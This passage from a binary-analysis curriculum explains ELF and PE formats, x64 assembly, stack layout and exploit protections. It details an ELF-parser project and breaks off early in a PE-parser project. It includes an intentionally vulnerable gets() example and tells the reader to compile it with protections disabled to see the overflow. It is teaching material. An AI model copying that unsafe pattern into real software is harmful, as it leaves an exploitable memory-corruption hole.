Learn Binary Analysis: From Zero to Reverse Engineering Master

Goal: Deeply understand binary analysis—from file formats and assembly to disassembly, debugging, exploitation, malware analysis, and building your own reverse engineering tools.


Why Learn Binary Analysis?

Binary analysis is the art of understanding compiled programs without source code. It’s the foundation of:

  • Security Research: Finding vulnerabilities in closed-source software
  • Malware Analysis: Understanding what malicious software does
  • CTF Competitions: Binary exploitation (pwn) challenges
  • Game Hacking/Modding: Reverse engineering game mechanics
  • Software Archaeology: Understanding legacy systems
  • Compiler Development: Seeing how high-level code becomes machine code

After completing these projects, you will:

  • Read and understand x86/x64 assembly fluently
  • Analyze any binary file format (ELF, PE, Mach-O)
  • Use professional tools (Ghidra, IDA, radare2, GDB)
  • Exploit buffer overflows and build ROP chains
  • Analyze malware safely and effectively
  • Build your own disassembler and analysis tools

Core Concept Analysis

The Binary Analysis Landscape

┌─────────────────────────────────────────────────────────────────────────┐
│                        SOURCE CODE (if available)                        │
│                                                                          │
│   int main() {                                                          │
│       char buf[64];                                                     │
│       gets(buf);        // Vulnerable!                                  │
│       return 0;                                                         │
│   }                                                                      │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
                                 ▼ Compilation
┌─────────────────────────────────────────────────────────────────────────┐
│                        BINARY EXECUTABLE                                 │
│                                                                          │
│   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00   .ELF............   │
│   03 00 3e 00 01 00 00 00 40 10 00 00 00 00 00 00   ..>.....@.......   │
│   ...                                                                    │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
          ┌──────────────────────┼──────────────────────┐
          ▼                      ▼                      ▼
┌──────────────────┐  ┌──────────────────┐  ┌──────────────────┐
│ STATIC ANALYSIS  │  │ DYNAMIC ANALYSIS │  │   EXPLOITATION   │
│                  │  │                  │  │                  │
│ • Disassembly    │  │ • Debugging      │  │ • Buffer Overflow│
│ • Decompilation  │  │ • Tracing        │  │ • ROP Chains     │
│ • CFG Analysis   │  │ • Instrumentation│  │ • Shellcode      │
│ • String Search  │  │ • Emulation      │  │ • Format Strings │
└──────────────────┘  └──────────────────┘  └──────────────────┘

Key Concepts Explained

1. Binary File Formats

ELF (Executable and Linkable Format) - Linux/Unix

┌──────────────────────────────────────────┐
│             ELF Header (64 bytes)        │
│  • Magic: 0x7F 'E' 'L' 'F'               │
│  • Class: 32-bit or 64-bit               │
│  • Entry point address                    │
│  • Program header offset                  │
│  • Section header offset                  │
├──────────────────────────────────────────┤
│         Program Header Table             │
│  (Segments - runtime view)               │
│  • PT_LOAD: Loadable segments            │
│  • PT_DYNAMIC: Dynamic linking info      │
│  • PT_INTERP: Interpreter path           │
├──────────────────────────────────────────┤
│              Sections                     │
│  .text    - Executable code              │
│  .data    - Initialized data             │
│  .bss     - Uninitialized data           │
│  .rodata  - Read-only data (strings)     │
│  .plt     - Procedure Linkage Table      │
│  .got     - Global Offset Table          │
│  .symtab  - Symbol table                 │
│  .strtab  - String table                 │
├──────────────────────────────────────────┤
│         Section Header Table             │
│  (Sections - linking view)               │
└──────────────────────────────────────────┘

PE (Portable Executable) - Windows

┌──────────────────────────────────────────┐
│           DOS Header                      │
│  • Magic: 'MZ' (0x5A4D)                  │
│  • e_lfanew: Offset to PE header         │
├──────────────────────────────────────────┤
│           DOS Stub                        │
│  "This program cannot be run in DOS mode"│
├──────────────────────────────────────────┤
│           PE Signature: "PE\0\0"         │
├──────────────────────────────────────────┤
│           COFF File Header               │
│  • Machine type (x86, x64, ARM)          │
│  • Number of sections                     │
│  • Timestamp                             │
├──────────────────────────────────────────┤
│        Optional Header (PE32/PE32+)      │
│  • Entry point (AddressOfEntryPoint)     │
│  • ImageBase (preferred load address)    │
│  • Data directories (imports, exports)   │
├──────────────────────────────────────────┤
│           Section Headers                 │
│  .text   - Code                          │
│  .data   - Initialized data              │
│  .rdata  - Read-only data, imports       │
│  .rsrc   - Resources (icons, dialogs)    │
└──────────────────────────────────────────┘

2. x86/x64 Assembly Fundamentals

Registers (x64)

General Purpose (64-bit):
┌─────────────────────────────────────────────────────────────┐
│ RAX (accumulator)      │ Return values, arithmetic          │
│ RBX (base)             │ Callee-saved, general purpose      │
│ RCX (counter)          │ Arg 4, loop counter                │
│ RDX (data)             │ Arg 3, I/O, multiplication         │
│ RSI (source index)     │ Arg 2, string source               │
│ RDI (destination)      │ Arg 1, string destination          │
│ RBP (base pointer)     │ Stack frame base (callee-saved)    │
│ RSP (stack pointer)    │ Current stack top                  │
│ R8-R15                 │ Additional registers (R8-R9 args)  │
└─────────────────────────────────────────────────────────────┘

Special Registers:
┌─────────────────────────────────────────────────────────────┐
│ RIP (instruction ptr)  │ Address of next instruction        │
│ RFLAGS                 │ Status flags (ZF, CF, SF, OF)      │
└─────────────────────────────────────────────────────────────┘

Register Sizes:
┌─────────────────────────────────────────────────────────────┐
│ 64-bit │ 32-bit │ 16-bit │ 8-bit high │ 8-bit low │
│  RAX   │  EAX   │   AX   │     AH     │    AL     │
│  RBX   │  EBX   │   BX   │     BH     │    BL     │
│  RCX   │  ECX   │   CX   │     CH     │    CL     │
│  RDX   │  EDX   │   DX   │     DH     │    DL     │
└─────────────────────────────────────────────────────────────┘

Calling Conventions

Linux x64 (System V AMD64 ABI):
  Arguments: RDI, RSI, RDX, RCX, R8, R9 (then stack)
  Return:    RAX (and RDX for 128-bit)
  Caller-saved: RAX, RCX, RDX, RSI, RDI, R8-R11
  Callee-saved: RBX, RBP, R12-R15

Windows x64:
  Arguments: RCX, RDX, R8, R9 (then stack, with shadow space)
  Return:    RAX
  Caller-saved: RAX, RCX, RDX, R8-R11
  Callee-saved: RBX, RBP, RDI, RSI, R12-R15

Common Instructions

; Data Movement
mov  rax, rbx       ; rax = rbx
lea  rax, [rbx+8]   ; rax = address of rbx+8 (load effective address)
push rax            ; Push rax onto stack
pop  rax            ; Pop top of stack into rax

; Arithmetic
add  rax, rbx       ; rax = rax + rbx
sub  rax, rbx       ; rax = rax - rbx
imul rax, rbx       ; rax = rax * rbx (signed)
xor  rax, rax       ; rax = 0 (clear register, common idiom)

; Comparison & Jumps
cmp  rax, rbx       ; Compare (sets flags)
test rax, rax       ; AND without storing (sets ZF if rax == 0)
jmp  label          ; Unconditional jump
je   label          ; Jump if equal (ZF=1)
jne  label          ; Jump if not equal (ZF=0)
jl   label          ; Jump if less (signed)
jg   label          ; Jump if greater (signed)

; Function Calls
call func           ; Push return address, jump to func
ret                 ; Pop return address, jump to it

; System Calls (Linux x64)
syscall             ; Invoke kernel (syscall number in RAX)

3. Stack Layout (x64)

High addresses
┌──────────────────────────────────────────┐
│           Previous Stack Frame           │
├──────────────────────────────────────────┤
│              Return Address              │  ← Pushed by CALL
├──────────────────────────────────────────┤
│              Saved RBP                   │  ← Pushed by function prologue
├──────────────────────────────────────────┤  ← RBP points here
│              Local Variable 1            │
├──────────────────────────────────────────┤
│              Local Variable 2            │
├──────────────────────────────────────────┤
│              Buffer (e.g., char[64])     │
├──────────────────────────────────────────┤  ← RSP points here
│              (Stack grows down)          │
└──────────────────────────────────────────┘
Low addresses

Function Prologue:
    push rbp          ; Save old base pointer
    mov  rbp, rsp     ; Set new base pointer
    sub  rsp, N       ; Allocate N bytes for locals

Function Epilogue:
    mov  rsp, rbp     ; Restore stack pointer
    pop  rbp          ; Restore old base pointer
    ret               ; Return to caller

4. Buffer Overflow Basics

Normal execution:
┌─────────────┐
│ Return Addr │ → points to caller
├─────────────┤
│ Saved RBP   │
├─────────────┤
│ Buffer[64]  │ ← User input goes here
└─────────────┘

After overflow:
┌─────────────┐
│ AAAA...AAAA │ ← Overwritten return address!
├─────────────┤     Now points to attacker code
│ AAAA...AAAA │ ← Overwritten saved RBP
├─────────────┤
│ AAAAAAAAAA  │ ← Original buffer, filled with 'A's
│ AAAAAAAAAA  │
│ AAAAAAAAAA  │
└─────────────┘
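The overflow above can be modeled safely in C. In this sketch a struct stands in for the stack frame (the fields `saved_rbp` and `ret_addr` are illustrative names, not real frame slots), and an unchecked linear copy starting at the buffer plays the role of gets():

```c
// Safe model of the overflow diagram: a struct mimics the frame layout, and a
// linear write starting at the buffer clobbers the fields above it.
// Field names are illustrative only.
#include <string.h>

struct fake_frame {
    char buffer[64];           /* lowest addresses: user input lands here */
    unsigned long saved_rbp;   /* stands in for the saved base pointer    */
    unsigned long ret_addr;    /* stands in for the return address        */
};

unsigned long clobbered_ret(void) {
    struct fake_frame f = { .saved_rbp = 0x1111, .ret_addr = 0x2222 };
    unsigned char payload[sizeof f];
    memset(payload, 'A', sizeof payload);  /* 64 + 8 + 8 = 80 bytes of 'A' */
    memcpy(&f, payload, sizeof f);         /* linear write from buffer up  */
    return f.ret_addr;                     /* now 0x4141414141414141       */
}
```

Compiling the real vulnerable snippet from the top of this section with `gcc -fno-stack-protector -no-pie` and feeding it more than 64 bytes of input corrupts the actual stack the same way.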

5. Static vs Dynamic Analysis

| Aspect    | Static Analysis          | Dynamic Analysis    |
|-----------|--------------------------|---------------------|
| Execution | No execution             | Runs the binary     |
| Tools     | Disassembler, decompiler | Debugger, tracer    |
| Pros      | Safe, complete coverage  | See actual behavior |
| Cons      | Can’t see runtime values | May miss code paths |
| Examples  | Ghidra, IDA, radare2     | GDB, strace, ltrace |

6. Modern Protections

┌─────────────────────────────────────────────────────────────┐
│ Protection           │ What it does                         │
├─────────────────────────────────────────────────────────────┤
│ ASLR                 │ Randomize memory layout              │
│ Stack Canary         │ Detect stack buffer overflows        │
│ NX/DEP               │ Non-executable stack/heap            │
│ PIE                  │ Position-independent executable      │
│ RELRO                │ Read-only GOT after relocation       │
│ CFI                  │ Control-flow integrity               │
└─────────────────────────────────────────────────────────────┘

Check protections with checksec:
$ checksec --file=./binary
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Binary Formats and Execution

Understanding ELF/PE structure explains how code, data, symbols, and relocations are represented and loaded.

Static and Dynamic Analysis

Static analysis builds a model without running code. Dynamic analysis confirms behavior and uncovers runtime-only paths.

Control Flow and Data Flow

Control flow graphs and data flow analysis reveal how inputs propagate and where vulnerabilities live.

Concept Summary Table

| Concept Cluster  | What You Need to Internalize           |
|------------------|----------------------------------------|
| Binary formats   | Sections, symbols, relocations         |
| Disassembly      | Instruction decoding and control flow  |
| Dynamic analysis | Debuggers, tracing, instrumentation    |
| Data flow        | Taint, sources/sinks, propagation      |
| Tooling          | Ghidra, IDA, radare2, objdump          |

Deep Dive Reading by Concept

| Concept          | Book & Chapter                                        |
|------------------|-------------------------------------------------------|
| ELF/PE           | Practical Binary Analysis — file format chapters      |
| Disassembly      | Hacking: The Art of Exploitation — assembly sections  |
| Analysis tools   | The Art of Debugging with GDB — core usage            |
| Program analysis | Engineering a Compiler — CFG/DFG sections             |

Project List

The following 18 projects will teach you binary analysis from fundamentals to advanced techniques.


Project 1: ELF File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust, Go
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / File Parsing
  • Software or Tool: ELF binaries, hex editor
  • Main Book: “Practical Binary Analysis” by Dennis Andriesse

What you’ll build: A command-line tool that parses ELF files and displays all headers, sections, segments, symbols, and relocations in a human-readable format—like a simplified readelf.

Why it teaches binary analysis: Every reverse engineering task starts with understanding the file format. Building a parser forces you to understand every byte of the ELF structure.

Core challenges you’ll face:

  • Parsing the ELF header → maps to understanding magic bytes, class (32/64-bit), endianness
  • Reading program headers → maps to segments, what gets loaded into memory
  • Reading section headers → maps to sections, symbols, strings
  • Handling different architectures → maps to x86, ARM, MIPS variations

Resources for key challenges:

  • Linux Audit - ELF Binaries - Excellent overview
  • “Practical Binary Analysis” Chapter 2 - Comprehensive ELF explanation
  • man elf - The ELF specification

Key Concepts:

  • ELF Header Structure: “Practical Binary Analysis” Ch. 2 - Andriesse
  • Program vs Section Headers: elf(5) man page
  • Symbol Tables: “Learning ELF” - Can Ozkan (Medium)

Difficulty: Intermediate
Time estimate: 1-2 weeks
Prerequisites: C programming, understanding of pointers and structs, familiarity with hexadecimal

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```bash
$ ./elf_parser /bin/ls
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:   ELF64
  Data:    2’s complement, little endian
  Version: 1 (current)
  OS/ABI:  UNIX - System V
  Type:    DYN (Shared object file)
  Machine: AMD x86-64
  Entry:   0x6b10

Program Headers:
  Type   Offset   VirtAddr           FileSiz  MemSiz   Flg
  PHDR   0x000040 0x0000000000000040 0x0002d8 0x0002d8 R
  INTERP 0x000318 0x0000000000000318 0x00001c 0x00001c R
  LOAD   0x000000 0x0000000000000000 0x003510 0x003510 R
  ...

Sections:
  [Nr] Name               Type     Address            Size
  [ 0]                    NULL     0x0000000000000000 0x0
  [ 1] .interp            PROGBITS 0x0000000000000318 0x1c
  [ 2] .note.gnu.build-id NOTE     0x0000000000000338 0x24
  ...

Symbols:
  Num: Value            Size Type Bind   Name
    1: 0000000000000000    0 FUNC GLOBAL printf@GLIBC_2.2.5
    2: 0000000000006b10  123 FUNC GLOBAL main
  ...
```


**Implementation Hints**:

Start by mapping the ELF header structure:

```c
// Don't write code, but understand this structure:
// Elf64_Ehdr contains:
//   e_ident[16]  - Magic number and other info
//   e_type       - Object file type (ET_EXEC, ET_DYN, etc.)
//   e_machine    - Architecture (EM_X86_64, EM_ARM, etc.)
//   e_entry      - Entry point virtual address
//   e_phoff      - Program header table file offset
//   e_shoff      - Section header table file offset
//   e_phnum      - Number of program headers
//   e_shnum      - Number of section headers
```

Questions to guide your implementation:

  1. How do you detect if a file is 32-bit or 64-bit ELF?
  2. How do you find the string table section to get section names?
  3. What’s the difference between .dynsym and .symtab?
  4. How do program headers map sections to memory segments?

Learning milestones:

  1. Parse ELF header correctly → Understand file identification
  2. Iterate program headers → Understand runtime memory layout
  3. Iterate section headers → Understand linking and symbols
  4. Resolve symbol names → Understand string tables
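As a starting point for milestone 1, here is a minimal sketch, assuming a 64-bit ELF and the glibc `<elf.h>` definitions (a real parser would branch on EI_CLASS first):

```c
// Milestone 1 sketch: read the ELF header and sanity-check the magic bytes.
// Assumes a 64-bit ELF; 32-bit files use the smaller Elf32_Ehdr layout.
#include <elf.h>
#include <stdio.h>
#include <string.h>

// Reads the header from `path` into `eh`. Returns 0 on success, -1 on
// I/O failure or if the file does not start with 0x7f 'E' 'L' 'F'.
int read_ehdr(const char *path, Elf64_Ehdr *eh) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t n = fread(eh, sizeof *eh, 1, f);
    fclose(f);
    if (n != 1) return -1;
    if (memcmp(eh->e_ident, ELFMAG, SELFMAG) != 0)  /* "\x7fELF" */
        return -1;
    return 0;
}
```

A `main()` that calls `read_ehdr()` on `argv[1]` and prints `e_type`, `e_machine`, `e_entry`, `e_phoff`/`e_phnum`, and `e_shoff`/`e_shnum` reproduces the first block of the sample output above.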

The Core Question You’re Answering

How does the operating system transform a static file on disk into a running process in memory, and what information does it need from the binary format to make this transformation?

This question drives everything in binary analysis. The ELF format exists to bridge the gap between storage and execution—understanding it means understanding how programs come to life.

Concepts You Must Understand First

1. Binary File Formats vs. In-Memory Representations

A binary file is just structured data on disk. When executed, the OS loader reads this file and creates a completely different structure in memory. Understanding the distinction is critical.

Guiding questions:

  • Why can’t the OS just load a file directly into memory and jump to it?
  • What transformations must happen between disk and memory?
  • How does the loader know where to place code vs data in memory?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 7 (Linking), “Practical Binary Analysis” Ch. 2 (The ELF Format)

2. Virtual Memory and Address Spaces

Every process believes it has the entire address space to itself. The ELF file tells the OS where to map segments in this virtual space.

Guiding questions:

  • What’s the difference between a file offset and a virtual address?
  • Why do ELF files specify both p_offset and p_vaddr?
  • How does the loader handle position-independent executables (PIE)?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 9 (Virtual Memory), “Low-Level Programming” Ch. 4 (Virtual Memory)
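One way to make the p_offset/p_vaddr distinction concrete is to print both columns from the program header table side by side. A sketch, assuming a 64-bit ELF on Linux:

```c
// Walks the program header table and prints p_offset (where the bytes live
// in the file) next to p_vaddr (where the loader maps them in memory).
// Returns the number of program headers, or -1 on error. 64-bit ELF assumed.
#include <elf.h>
#include <stdio.h>

int print_phdrs(const char *path) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    Elf64_Ehdr eh;
    if (fread(&eh, sizeof eh, 1, f) != 1) { fclose(f); return -1; }
    if (fseek(f, (long)eh.e_phoff, SEEK_SET) != 0) { fclose(f); return -1; }
    printf("%-6s %-10s %-18s\n", "Type", "Offset", "VirtAddr");
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        if (fread(&ph, sizeof ph, 1, f) != 1) break;
        printf("%-6u 0x%08lx 0x%016lx\n", ph.p_type,
               (unsigned long)ph.p_offset, (unsigned long)ph.p_vaddr);
    }
    fclose(f);
    return (int)eh.e_phnum;
}
```

Comparing this output against `readelf -l` on the same binary shows where the two columns agree and where (e.g., for .bss) the memory view diverges from the file view.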

3. Linking: Static, Dynamic, and Runtime

Programs rarely stand alone—they call library functions. ELF contains metadata for three types of linking.

Guiding questions:

  • What’s in .symtab vs .dynsym and why do we need both?
  • How does the dynamic linker find printf at runtime?
  • What happens during relocation?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 7.7-7.10 (Dynamic Linking), “Practical Binary Analysis” Ch. 2.3 (Symbols and Relocations)

4. Sections vs. Segments: A Critical Distinction

Sections are for linking (compile-time), segments are for loading (runtime). This is the most confusing aspect of ELF.

Guiding questions:

  • Can multiple sections map to one segment?
  • Why does readelf show both section headers and program headers?
  • Which is more important for reverse engineering: sections or segments?

Key reading: “Practical Binary Analysis” Ch. 2.2.4 (Sections and Segments), man elf (NOTES section)

5. Byte Order (Endianness)

Binary formats encode multi-byte integers. The byte order matters when reading file structures.

Guiding questions:

  • How do you detect endianness from the ELF header?
  • What happens if you parse a big-endian ELF on a little-endian machine?
  • Which fields in Elf64_Ehdr are multi-byte?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 2.1 (Information Storage), “Hacking: The Art of Exploitation” Ch. 2 (Programming)
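A parser answers these questions with a byte-swap helper keyed off EI_DATA in e_ident. A minimal sketch:

```c
// Byte-order handling: EI_DATA says how the file encodes multi-byte fields;
// swap only when the file's order differs from the host's.
#include <elf.h>
#include <stdint.h>

/* On a little-endian host the low-order byte is stored first. */
static int host_is_little(void) {
    uint16_t probe = 1;
    return *(const uint8_t *)&probe == 1;
}

/* Return `v` converted to host order, given the file's EI_DATA byte. */
uint32_t elf_read32(uint32_t v, uint8_t ei_data) {
    if ((ei_data == ELFDATA2LSB) == host_is_little())
        return v;                          /* orders match: no swap needed */
    return ((v & 0x000000FFu) << 24) | ((v & 0x0000FF00u) << 8) |
           ((v & 0x00FF0000u) >> 8)  | ((v & 0xFF000000u) >> 24);
}
```

The same helper, widened to 16 and 64 bits, covers every multi-byte field in Elf64_Ehdr.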

6. String Tables and Symbol Resolution

Strings in ELF aren’t stored inline—they’re in dedicated string table sections referenced by offset.

Guiding questions:

  • Why use offsets into .strtab instead of embedding strings?
  • How do you find the name of a section?
  • What’s the relationship between .symtab and .strtab?

Key reading: “Practical Binary Analysis” Ch. 2.3.1 (The Symbol Table), man elf (String Table section)

7. Position-Independent Code (PIC) and ASLR

Modern systems randomize addresses. ELF supports this through relocations and GOT/PLT.

Guiding questions:

  • How can you tell if an ELF is position-independent?
  • What’s the difference between ET_EXEC and ET_DYN?
  • Why do some binaries have a base address of 0x400000 and others 0x0?

Key reading: “Practical Binary Analysis” Ch. 5.4 (Position-Independent Code), “Computer Systems: A Programmer’s Perspective” Ch. 7.12 (Position-Independent Code)

Questions to Guide Your Design

  1. How will you handle both 32-bit and 64-bit ELF files? The structures are different (Elf32_Ehdr vs Elf64_Ehdr). Will you use compile-time selection or runtime detection?

  2. What’s your error handling strategy? What if the file claims to have 50 section headers but the file is too small? Corrupted binaries are common in malware analysis.

  3. How will you deal with endianness? Will you support parsing big-endian ELF files on little-endian hosts?

  4. Should you use mmap() or read()? Memory-mapping the file vs reading it into a buffer has different implications for large files.

  5. How will you represent and display multi-byte values? Should you show e_machine as 0x3e or EM_X86_64 or AMD x86-64?

  6. What level of validation will you implement? Check magic bytes only, or validate every offset and size field?

  7. How will you handle stripped binaries? What if .symtab is missing but .dynsym exists?

  8. Should your parser be a library or a standalone tool? Consider reusability for future projects.

Thinking Exercise

Before writing any code, perform these manual exercises:

Exercise 1: Hex Dump Analysis

xxd -l 128 /bin/ls

Using only the hex dump and the ELF specification (man elf):

  1. Identify the magic number
  2. Determine if it’s 32-bit or 64-bit
  3. Find the entry point address
  4. Locate the program header table offset
  5. Count the number of program headers

Write down the byte offsets and values. This forces you to understand the exact layout.

Exercise 2: Compare readelf Output

readelf -h /bin/ls
readelf -l /bin/ls
readelf -S /bin/ls

Create a mapping:

  • Which bytes in the hex dump correspond to “Entry point address”?
  • How does readelf calculate the “Start of section headers”?
  • Why is “Number of section headers” sometimes wrong? (Hint: large binaries)

Exercise 3: Trace the String Table

Using readelf -x .strtab /bin/ls, manually:

  1. Find a symbol name in .symtab
  2. Extract its st_name offset
  3. Navigate to that offset in .strtab
  4. Verify the null-terminated string

This teaches you how indirection works in binary formats.
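The same indirection can be traversed programmatically. A sketch (64-bit little-endian ELF assumed) that resolves every section name through the section-header string table, whose index is e_shstrndx:

```c
// Exercise 3 in code: each section's sh_name is an offset into .shstrtab
// (the section at index e_shstrndx). Prints every section name and returns
// the section count, or -1 on error. 64-bit little-endian ELF assumed.
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>

int list_section_names(const char *path) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    Elf64_Ehdr eh;
    if (fread(&eh, sizeof eh, 1, f) != 1) { fclose(f); return -1; }

    /* read the whole section header table */
    Elf64_Shdr *sh = malloc(eh.e_shnum * sizeof *sh);
    fseek(f, (long)eh.e_shoff, SEEK_SET);
    if (!sh || fread(sh, sizeof *sh, eh.e_shnum, f) != eh.e_shnum) {
        free(sh); fclose(f); return -1;
    }

    /* read .shstrtab, the string table that holds section names */
    Elf64_Shdr *str = &sh[eh.e_shstrndx];
    char *names = malloc(str->sh_size);
    fseek(f, (long)str->sh_offset, SEEK_SET);
    if (!names || fread(names, 1, str->sh_size, f) != str->sh_size) {
        free(names); free(sh); fclose(f); return -1;
    }
    fclose(f);

    for (unsigned i = 0; i < eh.e_shnum; i++)
        printf("[%2u] %s\n", i, names + sh[i].sh_name);  /* sh_name = offset */

    int n = (int)eh.e_shnum;
    free(names);
    free(sh);
    return n;
}
```

Symbol names work identically: st_name in a .symtab entry is an offset into .strtab rather than .shstrtab.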

Exercise 4: Draw the Memory Map

Using readelf -l, draw a diagram showing:

  • Which segments get loaded where in virtual memory
  • How segments overlap or abut
  • Where the .text and .data sections end up

Virtual Memory:
0x0000000000400000  +------------------+
                    | LOAD (R+X)       |  <- .text, .rodata
0x0000000000600000  +------------------+
                    | LOAD (RW)        |  <- .data, .bss
0x0000000000601000  +------------------+

The Interview Questions They’ll Ask

  1. “What’s the difference between a section and a segment in ELF?”
    • Sections are for linking (used by ld), segments are for loading (used by execve). One segment can contain multiple sections.
  2. “How does the dynamic linker know which libraries to load?”
    • The DT_NEEDED entries in the .dynamic section list required libraries. The linker searches paths in DT_RPATH, LD_LIBRARY_PATH, and default system paths.
  3. “Can you explain the GOT and PLT?”
    • Global Offset Table (GOT) stores addresses of external symbols. Procedure Linkage Table (PLT) provides lazy binding—only resolves functions when first called.
  4. “What happens when you execute a PIE binary?”
    • The kernel chooses a random base address (ASLR), loads all LOAD segments relative to that base, and updates the auxiliary vector with the base address.
  5. “How do you find the main() function in a stripped binary?”
    • Even stripped, _start is the entry point. Disassemble it—it calls __libc_start_main with main as an argument. That argument is the address of main.
  6. “What’s the significance of the .interp section?”
    • It specifies the path to the dynamic linker (e.g., /lib64/ld-linux-x86-64.so.2). Without it, dynamically linked programs can’t run.
  7. “Explain how relocations work.”
    • Relocations are fixups applied by the linker/loader. They adjust addresses based on where code is actually loaded. R_X86_64_RELATIVE adds the base address to a field.
  8. “Why do some binaries have two symbol tables (.symtab and .dynsym)?”
    • .dynsym contains only symbols needed for dynamic linking (kept in release builds). .symtab has all symbols (often stripped from release builds).
  9. “How can you detect if a binary is packed or encrypted?”
    • Look for high entropy in sections (should be code, but looks random), unusual section names, small .text sections with large writable sections, or UPX headers.
  10. “What’s the difference between ET_EXEC, ET_DYN, and ET_REL?”
    • ET_EXEC: static executable, fixed addresses. ET_DYN: shared object or PIE executable. ET_REL: relocatable object file (.o files).

Books That Will Help

| Topic | Book | Chapter/Section |
|---|---|---|
| ELF Format Overview | “Practical Binary Analysis” by Dennis Andriesse | Ch. 2: The ELF Format |
| ELF Loading Process | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch. 7.9: Loading Executable Object Files |
| ELF Headers and Structures | “Low-Level Programming” by Igor Zhirkov | Ch. 12: System Calls; Ch. 13: Models of Computation |
| Symbol Tables | “Computer Systems: A Programmer’s Perspective” | Ch. 7.5: Symbols and Symbol Tables |
| Dynamic Linking | “Computer Systems: A Programmer’s Perspective” | Ch. 7.7-7.12: Dynamic Linking |
| Relocations | “Practical Binary Analysis” | Ch. 2.3.3: Relocations |
| Virtual Memory | “Computer Systems: A Programmer’s Perspective” | Ch. 9: Virtual Memory |
| File I/O in C | “Hacking: The Art of Exploitation” by Jon Erickson | Ch. 2: Programming (File Access section) |
| Binary Data Structures | “Low-Level Programming” by Igor Zhirkov | Ch. 3: Assembly Language; Ch. 4: Virtual Memory |
| GOT/PLT Internals | “Practical Binary Analysis” | Ch. 2.3.4: Dynamic Linking |
| Position-Independent Code | “Computer Systems: A Programmer’s Perspective” | Ch. 7.12: Position-Independent Code (PIC) |
| ASLR and Security | “Hacking: The Art of Exploitation” | Ch. 5: Shellcode (ASLR section) |
| Stripped Binary Analysis | “Practical Malware Analysis” by Sikorski & Honig | Ch. 6: Recognizing C Code Constructs |
| Reference: ELF Specification | man elf (Linux manual) | All sections |

ASCII Diagram: ELF File Structure

+---------------------------+
|      ELF Header           |  <-- Always at offset 0
|  e_ident[16]              |      Contains magic number, class, endianness
|  e_type, e_machine        |      File type and architecture
|  e_entry                  |      Entry point virtual address
|  e_phoff, e_phnum         |  --> Points to Program Header Table
|  e_shoff, e_shnum         |  --> Points to Section Header Table
+---------------------------+
|                           |
|   Program Header Table    |  <-- For loader (runtime)
|   [Elf64_Phdr entries]    |      Describes segments
|   - LOAD (code)           |      e.g., map file offset X to vaddr Y
|   - LOAD (data)           |           with permissions RWX
|   - DYNAMIC               |
|   - INTERP                |
+---------------------------+
|                           |
|   .text section           |  <-- Executable code
|   (machine code bytes)    |
+---------------------------+
|   .rodata section         |  <-- Read-only data (strings)
|   "Hello, world\0"        |
+---------------------------+
|   .data section           |  <-- Initialized writable data
|   global variables        |
+---------------------------+
|   .bss section            |  <-- Uninitialized data (zero-filled)
|   (no bytes on disk!)     |      Only occupies memory at runtime
+---------------------------+
|   .symtab section         |  <-- Symbol table (often stripped)
|   [Elf64_Sym entries]     |      Function/variable names & addresses
+---------------------------+
|   .strtab section         |  <-- String table for .symtab
|   "\0printf\0main\0..."   |      Null-separated strings
+---------------------------+
|   .dynsym section         |  <-- Dynamic symbols (not stripped)
+---------------------------+
|   .dynstr section         |  <-- String table for .dynsym
+---------------------------+
|                           |
|   Section Header Table    |  <-- For linker (link-time)
|   [Elf64_Shdr entries]    |      Describes sections
|   - sh_name, sh_type      |      Name offset, section type
|   - sh_addr, sh_offset    |      Virtual addr, file offset
|   - sh_size, sh_link      |      Size, link to related section
+---------------------------+

Key insight: Program headers (segments) are what matters at runtime. Section headers are metadata for tools like ld and gdb. A stripped binary may have no section headers but still runs fine.


Project 2: PE File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / Windows Executables
  • Software or Tool: PE files, Windows or Wine
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A PE file parser that extracts headers, sections, imports, exports, and resources from Windows executables.

Why it teaches binary analysis: Windows malware analysis requires understanding PE format. Most real-world targets are Windows binaries.

Core challenges you’ll face:

  • DOS header and stub → maps to legacy compatibility
  • COFF and Optional headers → maps to PE32 vs PE32+
  • Import Address Table (IAT) → maps to dynamic linking, API calls
  • Export directory → maps to DLL functions

Resources for key challenges:

Key Concepts:

  • PE Structure: “Practical Malware Analysis” Ch. 1
  • Import Table: PE Format specification
  • Resources: CFF Explorer documentation

Difficulty: Intermediate
Time estimate: 1-2 weeks
Prerequisites: Project 1 (ELF Parser), understanding of Windows APIs

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```bash
$ ./pe_parser suspicious.exe
DOS Header:
  Magic:     MZ (0x5a4d)
  PE Offset: 0x100

PE Header:
  Signature: PE (0x4550)
  Machine:   x64 (0x8664)
  Sections:  5
  Timestamp: 2024-01-15 14:32:01

Optional Header:
  Magic:       PE32+ (0x20b)
  Entry Point: 0x1400012a0
